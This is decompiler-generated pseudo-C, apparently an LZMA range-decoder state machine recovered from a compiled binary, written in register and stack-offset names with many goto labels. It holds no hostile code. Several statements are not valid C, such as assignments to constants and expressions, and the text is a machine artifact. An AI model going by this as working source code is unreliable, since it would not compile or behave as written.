                                                              											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                              											__ecx =  *(__ebp - 4);
                                                              											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                              											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                              											__eflags =  *(__ebp - 0x38) - 4;
                                                              											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                              											if( *(__ebp - 0x38) >= 4) {
                                                              												__eflags =  *(__ebp - 0x38) - 0xa;
                                                              												if( *(__ebp - 0x38) >= 0xa) {
                                                              													_t98 = __ebp - 0x38;
                                                              													 *_t98 =  *(__ebp - 0x38) - 6;
                                                              													__eflags =  *_t98;
                                                              												} else {
                                                              													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                              												}
                                                              											} else {
                                                              												 *(__ebp - 0x38) = 0;
                                                              											}
                                                              											__eflags =  *(__ebp - 0x34) - __edx;
                                                              											if( *(__ebp - 0x34) == __edx) {
                                                              												__ebx = 0;
                                                              												__ebx = 1;
                                                              												goto L61;
                                                              											} else {
                                                              												__eax =  *(__ebp - 0x14);
                                                              												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                              												__eflags = __eax -  *(__ebp - 0x74);
                                                              												if(__eax >=  *(__ebp - 0x74)) {
                                                              													__eax = __eax +  *(__ebp - 0x74);
                                                              													__eflags = __eax;
                                                              												}
                                                              												__ecx =  *(__ebp - 8);
                                                              												__ebx = 0;
                                                              												__ebx = 1;
                                                              												__al =  *((intOrPtr*)(__eax + __ecx));
                                                              												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                              												goto L41;
                                                              											}
                                                              										case 7:
                                                              											__eflags =  *(__ebp - 0x40) - 1;
                                                              											if( *(__ebp - 0x40) != 1) {
                                                              												__eax =  *(__ebp - 0x24);
                                                              												 *(__ebp - 0x80) = 0x16;
                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                              												__eax =  *(__ebp - 0x28);
                                                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                              												__eax =  *(__ebp - 0x2c);
                                                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                              												__eax = 0;
                                                              												__eflags =  *(__ebp - 0x38) - 7;
                                                              												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              												__al = __al & 0x000000fd;
                                                              												__eax = (__eflags >= 0) - 1 + 0xa;
                                                              												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                              												__eax =  *(__ebp - 4);
                                                              												__eax =  *(__ebp - 4) + 0x664;
                                                              												__eflags = __eax;
                                                              												 *(__ebp - 0x58) = __eax;
                                                              												goto L69;
                                                              											}
                                                              											__eax =  *(__ebp - 4);
                                                              											__ecx =  *(__ebp - 0x38);
                                                              											 *(__ebp - 0x84) = 8;
                                                              											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                              											while(1) {
                                                              												 *(_t613 - 0x54) = _t606;
                                                              												goto L133;
                                                              											}
                                                              										case 8:
                                                              											goto L0;
                                                              										case 9:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												goto L89;
                                                              											}
                                                              											__eflags =  *(__ebp - 0x60);
                                                              											if( *(__ebp - 0x60) == 0) {
                                                              												goto L171;
                                                              											}
                                                              											__eax = 0;
                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                              											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                              											__eflags = _t258;
                                                              											0 | _t258 = _t258 + _t258 + 9;
                                                              											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                              											goto L75;
                                                              										case 0xa:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												__eax =  *(__ebp - 4);
                                                              												__ecx =  *(__ebp - 0x38);
                                                              												 *(__ebp - 0x84) = 0xb;
                                                              												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                              												while(1) {
                                                              													 *(_t613 - 0x54) = _t606;
                                                              													goto L133;
                                                              												}
                                                              											}
                                                              											__eax =  *(__ebp - 0x28);
                                                              											goto L88;
                                                              										case 0xb:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												__ecx =  *(__ebp - 0x24);
                                                              												__eax =  *(__ebp - 0x20);
                                                              												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                              											} else {
                                                              												__eax =  *(__ebp - 0x24);
                                                              											}
                                                              											__ecx =  *(__ebp - 0x28);
                                                              											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                              											L88:
                                                              											__ecx =  *(__ebp - 0x2c);
                                                              											 *(__ebp - 0x2c) = __eax;
                                                              											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                              											L89:
                                                              											__eax =  *(__ebp - 4);
                                                              											 *(__ebp - 0x80) = 0x15;
                                                              											__eax =  *(__ebp - 4) + 0xa68;
                                                              											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                              											goto L69;
                                                              										case 0xc:
                                                              											L99:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												 *(__ebp - 0x88) = 0xc;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t334 = __ebp - 0x70;
                                                              											 *_t334 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t334;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											__eax =  *(__ebp - 0x2c);
                                                              											goto L101;
                                                              										case 0xd:
                                                              											L37:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												 *(__ebp - 0x88) = 0xd;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t122 = __ebp - 0x70;
                                                              											 *_t122 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t122;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											L39:
                                                              											__eax =  *(__ebp - 0x40);
                                                              											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                              												goto L48;
                                                              											}
                                                              											__eflags = __ebx - 0x100;
                                                              											if(__ebx >= 0x100) {
                                                              												goto L54;
                                                              											}
                                                              											L41:
                                                              											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                              											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                              											__ecx =  *(__ebp - 0x58);
                                                              											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                              											 *(__ebp - 0x48) = __eax;
                                                              											__eax = __eax + 1;
                                                              											__eax = __eax << 8;
                                                              											__eax = __eax + __ebx;
                                                              											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              											__ax =  *__esi;
                                                              											 *(__ebp - 0x54) = __esi;
                                                              											__edx = __ax & 0x0000ffff;
                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              												__cx = __ax;
                                                              												 *(__ebp - 0x40) = 1;
                                                              												__cx = __ax >> 5;
                                                              												__eflags = __eax;
                                                              												__ebx = __ebx + __ebx + 1;
                                                              												 *__esi = __ax;
                                                              											} else {
                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                              												 *(__ebp - 0x10) = __ecx;
                                                              												0x800 = 0x800 - __edx;
                                                              												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                              												__ebx = __ebx + __ebx;
                                                              												 *__esi = __cx;
                                                              											}
                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              											 *(__ebp - 0x44) = __ebx;
                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                              												goto L39;
                                                              											} else {
                                                              												goto L37;
                                                              											}
                                                              										case 0xe:
                                                              											L46:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												 *(__ebp - 0x88) = 0xe;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t156 = __ebp - 0x70;
                                                              											 *_t156 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t156;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											while(1) {
                                                              												L48:
                                                              												__eflags = __ebx - 0x100;
                                                              												if(__ebx >= 0x100) {
                                                              													break;
                                                              												}
                                                              												__eax =  *(__ebp - 0x58);
                                                              												__edx = __ebx + __ebx;
                                                              												__ecx =  *(__ebp - 0x10);
                                                              												__esi = __edx + __eax;
                                                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              												__ax =  *__esi;
                                                              												 *(__ebp - 0x54) = __esi;
                                                              												__edi = __ax & 0x0000ffff;
                                                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              												__eflags =  *(__ebp - 0xc) - __ecx;
                                                              												if( *(__ebp - 0xc) >= __ecx) {
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              													__cx = __ax;
                                                              													_t170 = __edx + 1; // 0x1
                                                              													__ebx = _t170;
                                                              													__cx = __ax >> 5;
                                                              													__eflags = __eax;
                                                              													 *__esi = __ax;
                                                              												} else {
                                                              													 *(__ebp - 0x10) = __ecx;
                                                              													0x800 = 0x800 - __edi;
                                                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              													__ebx = __ebx + __ebx;
                                                              													 *__esi = __cx;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              												 *(__ebp - 0x44) = __ebx;
                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                              													continue;
                                                              												} else {
                                                              													goto L46;
                                                              												}
                                                              											}
                                                              											L54:
                                                              											_t173 = __ebp - 0x34;
                                                              											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                              											__eflags =  *_t173;
                                                              											goto L55;
                                                              										case 0xf:
                                                              											L58:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												 *(__ebp - 0x88) = 0xf;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t203 = __ebp - 0x70;
                                                              											 *_t203 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t203;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											L60:
                                                              											__eflags = __ebx - 0x100;
                                                              											if(__ebx >= 0x100) {
                                                              												L55:
                                                              												__al =  *(__ebp - 0x44);
                                                              												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                              												goto L56;
                                                              											}
                                                              											L61:
                                                              											__eax =  *(__ebp - 0x58);
                                                              											__edx = __ebx + __ebx;
                                                              											__ecx =  *(__ebp - 0x10);
                                                              											__esi = __edx + __eax;
                                                              											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                              											__ax =  *__esi;
                                                              											 *(__ebp - 0x54) = __esi;
                                                              											__edi = __ax & 0x0000ffff;
                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              												__cx = __ax;
                                                              												_t217 = __edx + 1; // 0x1
                                                              												__ebx = _t217;
                                                              												__cx = __ax >> 5;
                                                              												__eflags = __eax;
                                                              												 *__esi = __ax;
                                                              											} else {
                                                              												 *(__ebp - 0x10) = __ecx;
                                                              												0x800 = 0x800 - __edi;
                                                              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              												__ebx = __ebx + __ebx;
                                                              												 *__esi = __cx;
                                                              											}
                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              											 *(__ebp - 0x44) = __ebx;
                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                              												goto L60;
                                                              											} else {
                                                              												goto L58;
                                                              											}
                                                              										case 0x10:
                                                              											L109:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												 *(__ebp - 0x88) = 0x10;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t365 = __ebp - 0x70;
                                                              											 *_t365 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t365;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											goto L111;
                                                              										case 0x11:
                                                              											L69:
                                                              											__esi =  *(__ebp - 0x58);
                                                              											 *(__ebp - 0x84) = 0x12;
                                                              											while(1) {
                                                              												 *(_t613 - 0x54) = _t606;
                                                              												goto L133;
                                                              											}
                                                              										case 0x12:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												__eax =  *(__ebp - 0x58);
                                                              												 *(__ebp - 0x84) = 0x13;
                                                              												__esi =  *(__ebp - 0x58) + 2;
                                                              												while(1) {
                                                              													 *(_t613 - 0x54) = _t606;
                                                              													goto L133;
                                                              												}
                                                              											}
                                                              											__eax =  *(__ebp - 0x4c);
                                                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                              											__ecx =  *(__ebp - 0x58);
                                                              											__eax =  *(__ebp - 0x4c) << 4;
                                                              											__eflags = __eax;
                                                              											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                              											goto L130;
                                                              										case 0x13:
                                                              											__eflags =  *(__ebp - 0x40);
                                                              											if( *(__ebp - 0x40) != 0) {
                                                              												_t469 = __ebp - 0x58;
                                                              												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                              												__eflags =  *_t469;
                                                              												 *(__ebp - 0x30) = 0x10;
                                                              												 *(__ebp - 0x40) = 8;
                                                              												L144:
                                                              												 *(__ebp - 0x7c) = 0x14;
                                                              												goto L145;
                                                              											}
                                                              											__eax =  *(__ebp - 0x4c);
                                                              											__ecx =  *(__ebp - 0x58);
                                                              											__eax =  *(__ebp - 0x4c) << 4;
                                                              											 *(__ebp - 0x30) = 8;
                                                              											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                              											L130:
                                                              											 *(__ebp - 0x58) = __eax;
                                                              											 *(__ebp - 0x40) = 3;
                                                              											goto L144;
                                                              										case 0x14:
                                                              											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                              											__eax =  *(__ebp - 0x80);
                                                              											 *(_t613 - 0x88) = _t533;
                                                              											goto L1;
                                                              										case 0x15:
                                                              											__eax = 0;
                                                              											__eflags =  *(__ebp - 0x38) - 7;
                                                              											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              											__al = __al & 0x000000fd;
                                                              											__eax = (__eflags >= 0) - 1 + 0xb;
                                                              											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                              											goto L120;
                                                              										case 0x16:
                                                              											__eax =  *(__ebp - 0x30);
                                                              											__eflags = __eax - 4;
                                                              											if(__eax >= 4) {
                                                              												_push(3);
                                                              												_pop(__eax);
                                                              											}
                                                              											__ecx =  *(__ebp - 4);
                                                              											 *(__ebp - 0x40) = 6;
                                                              											__eax = __eax << 7;
                                                              											 *(__ebp - 0x7c) = 0x19;
                                                              											 *(__ebp - 0x58) = __eax;
                                                              											goto L145;
                                                              										case 0x17:
                                                              											L145:
                                                              											__eax =  *(__ebp - 0x40);
                                                              											 *(__ebp - 0x50) = 1;
                                                              											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                              											goto L149;
                                                              										case 0x18:
                                                              											L146:
                                                              											__eflags =  *(__ebp - 0x6c);
                                                              											if( *(__ebp - 0x6c) == 0) {
                                                              												 *(__ebp - 0x88) = 0x18;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x70);
                                                              											__eax =  *(__ebp - 0xc);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											_t484 = __ebp - 0x70;
                                                              											 *_t484 =  *(__ebp - 0x70) + 1;
                                                              											__eflags =  *_t484;
                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                              											L148:
                                                              											_t487 = __ebp - 0x48;
                                                              											 *_t487 =  *(__ebp - 0x48) - 1;
                                                              											__eflags =  *_t487;
                                                              											L149:
                                                              											__eflags =  *(__ebp - 0x48);
                                                              											if( *(__ebp - 0x48) <= 0) {
                                                              												__ecx =  *(__ebp - 0x40);
                                                              												__ebx =  *(__ebp - 0x50);
                                                              												0 = 1;
                                                              												__eax = 1 << __cl;
                                                              												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                              												__eax =  *(__ebp - 0x7c);
                                                              												 *(__ebp - 0x44) = __ebx;
                                                              												while(1) {
                                                              													 *(_t613 - 0x88) = _t533;
                                                              													goto L1;
                                                              												}
                                                              											}
                                                              											__eax =  *(__ebp - 0x50);
                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                              											__eax =  *(__ebp - 0x58);
                                                              											__esi = __edx + __eax;
                                                              											 *(__ebp - 0x54) = __esi;
                                                              											__ax =  *__esi;
                                                              											__edi = __ax & 0x0000ffff;
                                                              											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                              											__eflags =  *(__ebp - 0xc) - __ecx;
                                                              											if( *(__ebp - 0xc) >= __ecx) {
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                              												__cx = __ax;
                                                              												__cx = __ax >> 5;
                                                              												__eax = __eax - __ecx;
                                                              												__edx = __edx + 1;
                                                              												__eflags = __edx;
                                                              												 *__esi = __ax;
                                                              												 *(__ebp - 0x50) = __edx;
                                                              											} else {
                                                              												 *(__ebp - 0x10) = __ecx;
                                                              												0x800 = 0x800 - __edi;
                                                              												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                              												 *__esi = __cx;
                                                              											}
                                                              											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              											if( *(__ebp - 0x10) >= 0x1000000) {
                                                              												goto L148;
                                                              											} else {
                                                              												goto L146;
                                                              											}
                                                              										case 0x19:
                                                              											__eflags = __ebx - 4;
                                                              											if(__ebx < 4) {
                                                              												 *(__ebp - 0x2c) = __ebx;
                                                              												L119:
                                                              												_t393 = __ebp - 0x2c;
                                                              												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                              												__eflags =  *_t393;
                                                              												L120:
                                                              												__eax =  *(__ebp - 0x2c);
                                                              												__eflags = __eax;
                                                              												if(__eax == 0) {
                                                              													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                              													goto L170;
                                                              												}
                                                              												__eflags = __eax -  *(__ebp - 0x60);
                                                              												if(__eax >  *(__ebp - 0x60)) {
                                                              													goto L171;
                                                              												}
                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                              												__eax =  *(__ebp - 0x30);
                                                              												_t400 = __ebp - 0x60;
                                                              												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                              												__eflags =  *_t400;
                                                              												goto L123;
                                                              											}
                                                              											__ecx = __ebx;
                                                              											__eax = __ebx;
                                                              											__ecx = __ebx >> 1;
                                                              											__eax = __ebx & 0x00000001;
                                                              											__ecx = (__ebx >> 1) - 1;
                                                              											__al = __al | 0x00000002;
                                                              											__eax = (__ebx & 0x00000001) << __cl;
                                                              											__eflags = __ebx - 0xe;
                                                              											 *(__ebp - 0x2c) = __eax;
                                                              											if(__ebx >= 0xe) {
                                                              												__ebx = 0;
                                                              												 *(__ebp - 0x48) = __ecx;
                                                              												L102:
                                                              												__eflags =  *(__ebp - 0x48);
                                                              												if( *(__ebp - 0x48) <= 0) {
                                                              													__eax = __eax + __ebx;
                                                              													 *(__ebp - 0x40) = 4;
                                                              													 *(__ebp - 0x2c) = __eax;
                                                              													__eax =  *(__ebp - 4);
                                                              													__eax =  *(__ebp - 4) + 0x644;
                                                              													__eflags = __eax;
                                                              													L108:
                                                              													__ebx = 0;
                                                              													 *(__ebp - 0x58) = __eax;
                                                              													 *(__ebp - 0x50) = 1;
                                                              													 *(__ebp - 0x44) = 0;
                                                              													 *(__ebp - 0x48) = 0;
                                                              													L112:
                                                              													__eax =  *(__ebp - 0x40);
                                                              													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                              													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                              														_t391 = __ebp - 0x2c;
                                                              														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                              														__eflags =  *_t391;
                                                              														goto L119;
                                                              													}
                                                              													__eax =  *(__ebp - 0x50);
                                                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                              													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                              													__eax =  *(__ebp - 0x58);
                                                              													__esi = __edi + __eax;
                                                              													 *(__ebp - 0x54) = __esi;
                                                              													__ax =  *__esi;
                                                              													__ecx = __ax & 0x0000ffff;
                                                              													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                              													__eflags =  *(__ebp - 0xc) - __edx;
                                                              													if( *(__ebp - 0xc) >= __edx) {
                                                              														__ecx = 0;
                                                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                              														__ecx = 1;
                                                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                              														__ebx = 1;
                                                              														__ecx =  *(__ebp - 0x48);
                                                              														__ebx = 1 << __cl;
                                                              														__ecx = 1 << __cl;
                                                              														__ebx =  *(__ebp - 0x44);
                                                              														__ebx =  *(__ebp - 0x44) | __ecx;
                                                              														__cx = __ax;
                                                              														__cx = __ax >> 5;
                                                              														__eax = __eax - __ecx;
                                                              														__edi = __edi + 1;
                                                              														__eflags = __edi;
                                                              														 *(__ebp - 0x44) = __ebx;
                                                              														 *__esi = __ax;
                                                              														 *(__ebp - 0x50) = __edi;
                                                              													} else {
                                                              														 *(__ebp - 0x10) = __edx;
                                                              														0x800 = 0x800 - __ecx;
                                                              														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                              														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                              														 *__esi = __dx;
                                                              													}
                                                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              													if( *(__ebp - 0x10) >= 0x1000000) {
                                                              														L111:
                                                              														_t368 = __ebp - 0x48;
                                                              														 *_t368 =  *(__ebp - 0x48) + 1;
                                                              														__eflags =  *_t368;
                                                              														goto L112;
                                                              													} else {
                                                              														goto L109;
                                                              													}
                                                              												}
                                                              												__ecx =  *(__ebp - 0xc);
                                                              												__ebx = __ebx + __ebx;
                                                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                              												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              												 *(__ebp - 0x44) = __ebx;
                                                              												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                              													__ecx =  *(__ebp - 0x10);
                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                              													__ebx = __ebx | 0x00000001;
                                                              													__eflags = __ebx;
                                                              													 *(__ebp - 0x44) = __ebx;
                                                              												}
                                                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                              												if( *(__ebp - 0x10) >= 0x1000000) {
                                                              													L101:
                                                              													_t338 = __ebp - 0x48;
                                                              													 *_t338 =  *(__ebp - 0x48) - 1;
                                                              													__eflags =  *_t338;
                                                              													goto L102;
                                                              												} else {
                                                              													goto L99;
                                                              												}
                                                              											}
                                                              											__edx =  *(__ebp - 4);
                                                              											__eax = __eax - __ebx;
                                                              											 *(__ebp - 0x40) = __ecx;
                                                              											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                              											goto L108;
                                                              										case 0x1a:
                                                              											L56:
                                                              											__eflags =  *(__ebp - 0x64);
                                                              											if( *(__ebp - 0x64) == 0) {
                                                              												 *(__ebp - 0x88) = 0x1a;
                                                              												goto L170;
                                                              											}
                                                              											__ecx =  *(__ebp - 0x68);
                                                              											__al =  *(__ebp - 0x5c);
                                                              											__edx =  *(__ebp - 8);
                                                              											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                              											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                              											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                              											 *( *(__ebp - 0x68)) = __al;
                                                              											__ecx =  *(__ebp - 0x14);
                                                              											 *(__ecx +  *(__ebp - 8)) = __al;
                                                              											__eax = __ecx + 1;
                                                              											__edx = 0;
